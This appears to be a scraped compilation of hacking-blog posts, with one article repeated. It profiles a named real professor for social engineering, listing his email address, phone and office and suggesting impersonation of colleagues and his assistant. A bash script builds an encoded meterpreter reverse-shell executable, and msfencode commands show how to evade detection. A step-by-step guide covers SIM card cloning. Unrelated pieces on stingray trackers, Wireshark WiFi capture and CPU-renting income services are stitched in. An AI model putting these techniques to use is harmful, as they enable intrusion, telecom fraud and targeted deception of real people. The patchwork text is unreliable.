Building Profiles for a Social Engineering Attack

The key to a successful social engineering engagement is trust.If you are able to win the trust of someone else easily then you can obtain any information you want.Also people are suspicious when they don’t know someone and they are not so open when you are going to ask for something about them or their company.However if you have done your research and you are giving them information that have valid grounds then you might be able to convince them and win their trust faster.In this article we will see how we can create a profile for someone who we don’t know.

Let’s say that our client is the MIT(Massachusetts Institute of Technology) and we don’t have any information about them.As a first step is to discover email addresses and profiles that exist on social media networks.We have two options in this step.We can use either the tool theHarvester or we can use the metasploit module calledsearch_email_collector.

The use of the email collector module of the metasploit framework is pretty simple.We just need to set the domain of our target and it will automatically search through Bing,Yahoo and Google for valid email addresses.

 

Our target in this case is the MIT so the domain that we want to set is the mit.edu.Below is a sample of our results.

 

From the other hand the tool theHarvester is providing us with more options.So except of the fact that we can scan for email addresses,we can scan also for profiles in social media like Google+ and Linkedin.In the next image you can see the command that we have executed in the tool.

 

Below is a sample of the email addresses that the tool theHarvester has discovered.Of course we can combine the results with the module of the metasploit if we wish.

 

We can try also to scan for profiles related to the mit.edu into professional social networks like Linkedin.We have discovered 2 profiles.

 

So we have a lot of email addresses and two names.Comparing the results with the metasploit module email collector we have identify that there is an email address that is probably corresponds to the Walter Lewin profile.The email address is lewin@mit.eduand you can see it in the results below.

 

Now that we have a name and an email address it is much more easier to search the web in order to collect as much information as possible about this particular person.For example we can start by checking his Linkedin profile.

 

We can use the email address lewin@mit.edu to discover his Facebook profile.

 

The information that we can retrieve without being friends on Facebook with is limited.However if we impersonate ourselves as a teacher of MIT we can send a friend request and we might be able to convince him with this way to add us to his friend list so we can have access to much more personal information.Another good tool for obtaining information is through the website pipl.com.

 

As you can see we have discovered information about the age,the job,the personal web space,his Amazon wish list and a website that contains the profile about this professor.Also from the same search we have manage to find his work phone number and his office room.

 

We can verify the above details by simply discovering his personal web page of the MIT.

 

From the above image except of the phone numbers and the addresses we have discovered also and the assistant of this professor.This can help us in many ways like:we are sending him an email pretending that it comes from his assistant.The professor will think that it came from a person that he trusts so he will respond to our questions more easily.

Basically the idea when constructing a profile of the person that you will use your social engineering skills is to have as much information as possible about his interests and activities,his friends and colleagues,emails and phone numbers etc.Keeping all that information on your notebook will help you to construct an ideal scenario that will work.

Conclusion

Exposure of personal information is an advantage for every social engineer guy.Every information that you will post on the Internet eventually it will stay forever.So before you post something personal think twice if it is really necessary to allow other people to know about my self and my activities.Also using different email addresses and usernames will make the work of social engineers much more difficult.

Disclaimer

Pentestlab appreciates highly the professor Mr. Walter Lewin and respects his work and contribution to the science and doesn’t encourage in any way his readers to use this personal information in order to perform illegal activities against this person.

SOURCE:

The key to a successful social engineering engagement is trust.If you are able to win the trust of someone else easily then you can obtain any information you want.Also people are suspicious when they don’t know someone and they are not so open when you are going to ask for something about them or their company.However if you have done your research and you are giving them information that have valid grounds then you might be able to convince them and win their trust faster.In this article we will see how we can create a profile for someone who we don’t know.

Let’s say that our client is the MIT(Massachusetts Institute of Technology) and we don’t have any information about them.As a first step is to discover email addresses and profiles that exist on social media networks.We have two options in this step.We can use either the tool theHarvester or we can use the metasploit module calledsearch_email_collector.

The use of the email collector module of the metasploit framework is pretty simple.We just need to set the domain of our target and it will automatically search through Bing,Yahoo and Google for valid email addresses.

 

Our target in this case is the MIT so the domain that we want to set is the mit.edu.Below is a sample of our results.

 

From the other hand the tool theHarvester is providing us with more options.So except of the fact that we can scan for email addresses,we can scan also for profiles in social media like Google+ and Linkedin.In the next image you can see the command that we have executed in the tool.

 

Below is a sample of the email addresses that the tool theHarvester has discovered.Of course we can combine the results with the module of the metasploit if we wish.

 

We can try also to scan for profiles related to the mit.edu into professional social networks like Linkedin.We have discovered 2 profiles.

 

So we have a lot of email addresses and two names.Comparing the results with the metasploit module email collector we have identify that there is an email address that is probably corresponds to the Walter Lewin profile.The email address is lewin@mit.eduand you can see it in the results below.

 

Now that we have a name and an email address it is much more easier to search the web in order to collect as much information as possible about this particular person.For example we can start by checking his Linkedin profile.

 

We can use the email address lewin@mit.edu to discover his Facebook profile.

 

The information that we can retrieve without being friends on Facebook with is limited.However if we impersonate ourselves as a teacher of MIT we can send a friend request and we might be able to convince him with this way to add us to his friend list so we can have access to much more personal information.Another good tool for obtaining information is through the website pipl.com.

 

As you can see we have discovered information about the age,the job,the personal web space,his Amazon wish list and a website that contains the profile about this professor.Also from the same search we have manage to find his work phone number and his office room.

 

We can verify the above details by simply discovering his personal web page of the MIT.

 

From the above image except of the phone numbers and the addresses we have discovered also and the assistant of this professor.This can help us in many ways like:we are sending him an email pretending that it comes from his assistant.The professor will think that it came from a person that he trusts so he will respond to our questions more easily.

Basically the idea when constructing a profile of the person that you will use your social engineering skills is to have as much information as possible about his interests and activities,his friends and colleagues,emails and phone numbers etc.Keeping all that information on your notebook will help you to construct an ideal scenario that will work.

Conclusion

Exposure of personal information is an advantage for every social engineer guy.Every information that you will post on the Internet eventually it will stay forever.So before you post something personal think twice if it is really necessary to allow other people to know about my self and my activities.Also using different email addresses and usernames will make the work of social engineers much more difficult.

Disclaimer

Pentestlab appreciates highly the professor Mr. Walter Lewin and respects his work and contribution to the science and doesn’t encourage in any way his readers to use this personal information in order to perform illegal activities against this person.

Advertisements

Create Executable Payloads Automatically

This script will create an executable file which it will listen in 3 different ports and it will be encoded with the shikata_ga_nai encoder.Of course it can be used also to create different file extensions like .vba etc automatically.You can see the source code of the script below.

Source Code:

#!/bin/bash
# Simple builder
LHOST="192.168.91.135"
LPORTS="4444 5555 6666"

rm -fr /tmp/msf.raw
rm -fr /tmp/msf1.raw
echo "Building…"
echo -n "Port: `echo $LPORTS | cut -d " " -f 1`"
echo ""
msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=$LHOST LPORT=`echo $LPORTS | cut -d " " -f 1` exitfunc=thread > /tmp/msf.raw
for LPORT in `echo $LPORTS`
do
echo -n "Port: $LPORT"
echo ""
msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=$LHOST LPORT=$LPORT exitfunc=thread -c /tmp/msf.raw > /tmp/msf1.raw
cp /tmp/msf1.raw /tmp/msf.raw
done
# Change option –f exe to –f vba in order to create a vba file
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai LHOST=$LHOST LPORT=$LPORT exitfunc=thread -c /tmp/msf1.raw > msf.exe
rm -fr /tmp/msf.raw
rm -fr /tmp/msf1.raw
echo -n "Done!"

Original Author: Michele

First posted here

SOURCE: https://pentestlab.wordpress.com

MSFencode Commands

msfencode -h

Display the help file of msfencode

msfencode -l

Lists the available encoders

msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)

Format to display the encoded buffer

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

Uses the shikata_ga_nai encoder to encode the payload.raw 5 times and exports it to a file called encoded_payload.exe

msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

Creation of a multi-encoded payload

msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c

Create pure alphanumeric shellcode where ESI points to the shellcode;output in C-style notation

Reference:

From the book Metasploit – The Penetration Testers Guide

How to clone SIM Card

NOTE: Following information is for educational purposes only!
The following guide enables us to make clones of SIM used in India that means you can use one number with two SIM cards at the same time.
Before i start off with this guide ,i would like to make one thing clear SIM CLONING is illegal. So please use this guide for personal purpose only,do not use this guide for cheating.
First off a little introduction about SIM CARD:
Our sim cards contain two secret codes or keys called (imsi value and ki value) which enables the operator to know the mobile number and authenticate the customer ,these codes are related to our mobile numbers which the operators store in their vast data base,it is based on these secret keys that enables the billing to be made to that customer. now what we do in sim cloning is extract these two secret codes from the sim and programme it into a new blank smart card often known as wafer, since the operator
authentication on sims is based on these values,it enables us to fool the operators in thinking that its the
original sim,this authentication is a big flaw concerning GSM technology
Now which sim cards can be cloned:
Sim cards are manufactured on the basis of 3 algorithms COMP128v1,COMP128v2 and COMP128v3
now an important note currently only COMP128v1 version sim cards can be
cloned ,since this is the only algorithm which has been cracked by users, bear in mind that 70% of all the sim cards we use are COMP128v1 .
OK thats it about the background….. now lets get to the Main Part
1. Buy a Sim card Reader
2.Need a Blank sim card or super sim card
5. Install programs.
6. go in phone tools, select sim card, then select unlock sim, it will promt for a code.
7 call network provider, they will ask for your phone number, your account info, name and security code,
then they will ask why you want to unlock your simcard, just tell them you need to unlock your sim to get it
to work with your overseas phone or something.
8. Once they give you the sim unlock code, enter it, and it will say sim unlocked.
9. remove the sim from your phone, place it in the cardreader, click read from card in magic sim program.
10. once it says connected, select crack sim in the toolbar. click strong ki and clink all of the other find options and then click start.
11. Once your ki is found and the crack is finished, click file, save as and save your cracked sim info to a that file.
12. IMPORTANT!!! you must click disconnect from the file menu or you will ruin your simcard. once it says
disconnected, remove the sim. put it in your phone and see if it still works, it should. if not, you either did not unlock your sim, or you tried to copy it instead of crack and save.
13. insert black 3g card Use other program, not magic sim at this point.
14. click connect
15. it will say no info found if it is truly blank.
16. select write to sim, it will promt you to select a dat file, select the one you saved before, now click start, it will take about 10 minutes to write it, once it is complete, it will ask for a security code, enter the security code network provider gave you, then click finish.
17. your card is cloned. if you try to make 2 calls at the same time, one will go through, the other will say call failed, and both phones will get the same messages, text and voice, and both will recieve the same calls, but only one can talk at a time.
Source: hackaholik.blogspot.in
Image Source: mobiledit.com

Fake Cell Phone Tower Used to Track Your Every Move

Over the past 12-18 months, there’s been an increased level of scrutiny applied to the various ways local, state, and federal law enforcement officials track and monitor the lives of ordinary citizens. One tool that’s come under increasing fire is the so-called stingray — a fake cell phone tower that law enforcement officials deploy to track a suspect, often without a warrant or any other formal approval.

A stingray is a false cell phone tower that can force phones in a geographical area to connect to it. Once these devices connect, the stingray can be used to either hone in on the target’s location or, with some models, actually eavesdrop on conversations, text messages, and web browser activity. It’s not clear how much the police cooperate with the cell phone carriers on this — in at least some cases, the police have gone to carriers with requests for information, while in others they seem to have taken a brute-force approach, dumping the data of every single user on a given tower and then sorting it to find the parties they’re interested in tracking. Stingrays can be used to force the phone to give up its user details, making it fairly easy for the police to match devices and account holders.

Stingray

The potential uses for the information are enormous. Say a murder occurs on a particular street with an estimated time of death between 2 and 4 AM. Local law enforcement would have an obvious interest in compelling cell phone companies to turn over the records of every cell phone that moved in and out of the area between those two time periods. At rush hour, this kind of information would be useless — but if the cell phone network data shows a device in the same approximate area as the murder suddenly leaving the area at a high rate of speed, that cell phone owner is a potential suspect.

Virtually all the stingray devices in use across the United States are manufactured by one company, the Harris Corporation, which makes a variety of other tracking devices. Its other products can be used to conduct denial-of-service attacks on cell phones, monitor voice traffic, amplify the range and power of stingray attacks, and more sophisticated monitoring tools for triangulating an individual’s location.

A consistent disregard for constitutional safeguards

Used properly, stingrays could be an incredibly useful tool for law enforcement, but there are enormous problems with their current deployments. Police often fail to submit a warrant request — one police department in Florida has admitted to using a stingray more than 200 times since 2010 without ever getting a warrant for its use. These devices are indiscriminate — in rare cases, such as a stolen cell phone, police may know in advance precisely which device to target, but in the majority of scenarios they’re fishing for bait to see what they can find. The only indication that a phone has been trapped into connecting to a stingray may be a sudden increase in power consumption (the stingray tells the phone to run its antenna at maximum power).

The problems only increase from here. The Harris Corporation has an NDA (non-disclosure agreement) in place with all its customers that explicitly forbids them from disclosing the fact that they use or own a stingray device. In the aforementioned Florida case, police have acknowledged that they avoided applying for a warrant specifically so they would not have to explain the use of the stingray to a judge.

States using Stingray devices

Meanwhile, the Obama Administration, having learned its lesson over repeatedly attempting to quash the Snowden disclosures, has welcomed discussion of how these devices are being used to spy on Americans by local officials without any regard for the rule of law.

Just kidding!

The Obama Administration is actually telling police agencies to refuse FOIA requests on security grounds or censoring such documents to the point of worthlessness. Last week, the US Marshals interfered in a case in Florida to prevent the ACLU from meeting with local police officials to discuss the use of stingray technology. According to the ACLU, the Marshal’s deputized the local police force, declared all materials related to stingray use to be government property, and took the records off-site.

The problem here isn’t necessarily the capability, but the ways in which that capability is being used. As with license plate detectors, the police have eagerly embraced the idea of tracking the movements of innocent people with no regard for how that data might be misinterpreted or abused. They’ve signed NDAs with a company that seeks to circumvent the Freedom of Information Act, and avoided disclosing the existence of programs in order to avoid the chance of possible censure.

New technology like DNA analysis and fingerprinting has often been controversial at the outset, but this widespread mobile tracking has no analog in history. There’s an ongoing campaign to blanket the US in local Freedom of Information Act requests for data on stingray use across the country; if you’re interested in contributing, details are here. The goal is to map individual departments and derive an understanding of how practices differ across the nation.

 Source: extremetech.com

 

Capture WiFi traffic using Wireshark

How to capture WiFi traffic using Wireshark on Windows

Wireshark uses libpcap or Winpcap libraries to capture network traffic on Windows. Winpcap libraries are not intended to work with wireless network cards, therefore they do not support WiFi network traffic capturing using Wireshark on Windows. Therefore, Wireshark monitor mode for Windows is not supported by default.

Winpcap Capture Limitations and WiFi traffic on Wireshark

Capture is mostly limited by Winpcap and not by Wireshark. However, Wireshark includes Airpcap support, a special -and expensive- set of WiFi network adapters, which drivers support network traffic monitoring on monitor mode. In other words, WiFi network traffic capturing on promiscuous mode.

Acrylic WiFi products include an NDIS traffic capture driver that captures WiFi network traffic on monitor mode on Windows, capturing WiFi traffic with Wireshark on Windows Vista, Windows 7, Windows 8, and Windows 8.1. This driver adds wireless network compatibility on Windows to other WiFi sniffers.

NDIS Driver and WiFi interfaces on Wireshark

To make this integration possible, Acrylic installs an airpcap.dll library in the system. When Wireshark loads the installed airpcap library, it returns a fake list of airpcap network cards installed. One Airpcap device for each integrated WiFi network card or external USB WiFi network card.

WiFi network card using Wireshark on Windows

Through this method, you can use your preferred network analyzer compatible with Airpcap to monitor WiFi packets under windows. You can view wifi traffic by using Wireshark, cain & Abel, Elcomsoft wireless security auditor or with Acrylic. By double clicking on the network interface on wireshark, you can access the interface settings. You can see that the interface shows a link-layer header, which includes captured packet signal level information.

Wireshark NDIS WiFi interface detail on Windows

By clicking on the “Wireless settings” button, you can configure advanced settings, such as WiFi channel to monitor and FCS check. FCS, or Frame Check Sequence, is a WiFi network packet integrity signature that discards corrupt packets.

Wireshark select channel using NDIS WiFi network card on Windows

WiFi traffic capturing using Wireshark

All in all, after installing Acrylic WiFi, launch Wireshark with Administrator privileges (by right clicking on the Wireshark icon and selecting “Run as administrator”) and select any NDIS network interface WiFi network card. In this example, the Dell integrated WiFi network card (Dell Wireless 1702/b/g/n).
Wireshark Capture NDIS WiFi Windows

Video tutorial Acrylic WiFi NDIS driver with Wireshark on Windows

 


Source:https://www.acrylicwifi.com

Earn Money By Keeping Your PC ON

If I will tell you that you can make money while sleeping or without doing just anything, will you beleive? Obviously NOT. There are thousands of scams available in internet world who harnesssed this sentence to deceive longing users so much that no one want to trust if there are really some ways to make money online without just doing doing anything.

But, we created to serve you real, working and powerful tricks to make your life easier, and not to deceive you in any manner. So, today we are telling you some real ways to make money online by just turning your PC ON and sit back.

Make Money Onilne - While Sleeping

How is this possible?

Yeah, this is an obvious question arising in your mind. And, we’re really happy to have this question in your mind. Well, the services here I am going to share uses idle time of your CPU and pays you for the same. They’re not paying you for free but paying to use your CPU’s computation power.

So, even if you are not putting any extra effort to make money in this way, you’re actually helping companies by providing your CPU’s computaion power and they’re paying you for the same. No worries, you’ll not get paid for free.

😛

Let your PC make money for you

Without taking much of your time, I am serving you the trusted services which actually pays you for giving your CPU’s idle time.

1. Gomez PEER

Gomez PEER is a distributed computing software and the most popular service people use to share there CPU’s idle time and make some money. The website provides you a secure java application that runs in backgrond and use your system’s unused resources such as processing power, RAM, bandwith to test the performance of many of world’s most popular websites.

71There are over 150,000 individuals who are using this service to make money. Sign up for free and help Gomez PEER to make internet a faster, more reliable tool while making money on your side.

2. Slicify

Slicify is another trusted platform to sell your computer power and make some money. If you have a Windows PC, you’re good to go. Just sign up for free, download its free Windows software to rent out your PC on Internet when you’re not using it. When someone wants to use your computer, they book it through Slicify and pay you to rent it, anywhere from a few cents to a dollar an hour.

slicify

3. CoinBeez

CoinBeez is another cool startup which uses the similar approach to help some of their users to make money while some others to use other computer’s CPU to perform severe computing task. According to CoinBeez, they’re building a supercomputer for which 15,000+ users are providing them CPU power, they obviously pay for this. They rent their processing power which they’ve collected to other companies.

4. Digital Generation

Similar to other service, this startup also uses your computer’s idle time. As like normal computer software, you install Digital Generation’s software. Now, run this application and sit back. The app will run in backgound while using your computer’s resources. You will not notice and performance decrement. All you’ll notice is “money increased in your wallet”.

5. IPU Services

Idle Processor Utilization Service is available on Internet from a long time, giving users reason to keep their PC idle instead of turning it OFF after completing task. The service has crosses over 100k users base. You EARN MONEY by simply downloading its Process Software, then leaving your computer on. That’s it.

No purchase is necessary at all for you to earn money. Simply Register (below), and download the process software. That’s it.

IPU

6. MQL 5 – Distributed Cloud Network

Directly from MQL5: “Today’s computers spend most of their time idle and do not use all the features of their CPU. Now you can benefit from the spare power of your PC.

You can sell your computer’s CPU time to other members of our network community for a variety of tasks like optimizing Expert Advisors optimization or developing mathematical models.”

mql 5

7. RUBLIK

Get paid doing nothing by joining RUBLIK passive income program. This service perform GPU mining (bitcoin mining) and use your CPU for the same. If you’re not familiar with the words just google “GPU mining” or “Bitcoin Mining” or read relevant articles on wikipedia.

Payment: $0.07 for 1000 solutions (no need to do anything, just turn on the software).

RUBLIK

Conclusions

All of these services are popular and trusted. You can use those services which suits you better. Many people are earning passive income using this way to make money. So, it would be great for you to test any of these services check if you really get benifited or not.

By the way, you don’t always required to sit back

😉 you can perform other tasks on your PC like browsing website, playing games, completing projects, etc. All above services uses applications which runs in background.

Source: techgyd.com